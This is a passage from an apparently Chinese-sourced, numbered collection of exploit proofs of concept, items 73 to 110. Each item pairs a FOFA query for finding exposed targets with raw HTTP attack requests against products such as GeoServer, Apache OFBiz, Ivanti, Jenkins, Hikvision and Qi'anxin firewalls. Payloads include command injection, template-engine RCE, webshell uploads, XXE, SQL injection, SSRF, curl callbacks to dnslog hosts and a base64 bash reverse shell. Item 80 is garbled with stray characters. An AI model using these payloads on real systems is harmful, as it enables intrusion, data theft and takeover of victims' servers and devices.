S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传4 C, a, w. [" J  C- W
FOFA:app="速达软件-公司产品"
- l  v8 t1 T6 ?% @POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
$ q% C4 G5 x' L7 k5 a' z' p$ K/ o/ HHost: x.x.x.x
& x* ^) }6 s' F. F( _! Q8 T  \: bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 Q" B9 F* H3 H, _, \: WContent-Length: 27
6 e& x) `; y4 {6 ?+ vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 ]0 E* ^7 a' K0 i. J, k! P0 KAccept-Encoding: gzip, deflate
" M  e3 X% B' _, t' k8 u3 w# JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 [) m- W- A, UConnection: close
0 l. V" h; X8 N8 K) ?Content-Type: application/octet-stream
/ W8 |* n2 X, [5 MUpgrade-Insecure-Requests: 1
/ P% {; W7 A- C) S/ _2 Q
( ~% R6 O1 ~* E  B& F7 T+ O3 j( J) {<% out.print("oessqeonylzaf");%>! |1 b; N, _1 w$ _5 O6 p
& I# `% r! |) k6 d- b3 a
1 S$ l3 ~1 J1 s; Q+ t5 @2 i
GET /xykqmfxpoas.jsp HTTP/1.1
7 P+ f3 |  i" m7 kHost: x.x.x.x( U5 h) z2 h& g5 q$ h+ }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  K& F2 A. X) ]% A- r( KConnection: close+ w0 V( N* x3 T2 ~/ q; N* n0 D
Accept-Encoding: gzip1 c, _) `+ w& x3 a% r1 l( {

$ \$ m; }6 M1 Q9 O6 d
" q3 o  Q# ~# z, f9 K" C81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
2 f: b' m' m% j. w( t0 `- d9 tFOFA:app="uniview-视频监控"5 i" a- {$ z; b
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
( \" B  E* i9 s6 ~# {' XHost: x.x.x.x  ^- z: K! j" a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% f/ b; k4 ^8 @5 _3 E( w/ e! s3 y% }Connection: close  c' m0 R, A  x8 P$ D! q5 S) }! |
Accept-Encoding: gzip
; W: O  d) s7 B- D5 _
0 W6 O! o: v/ d; }% Z! ]8 t( d' ~: E* G' n, B) `; V2 }) C
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The EXP request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <<ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document's contents; the XML document is as follows
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. Goanywhere MFT unauthenticated administrator creation
CVE-2024-0204
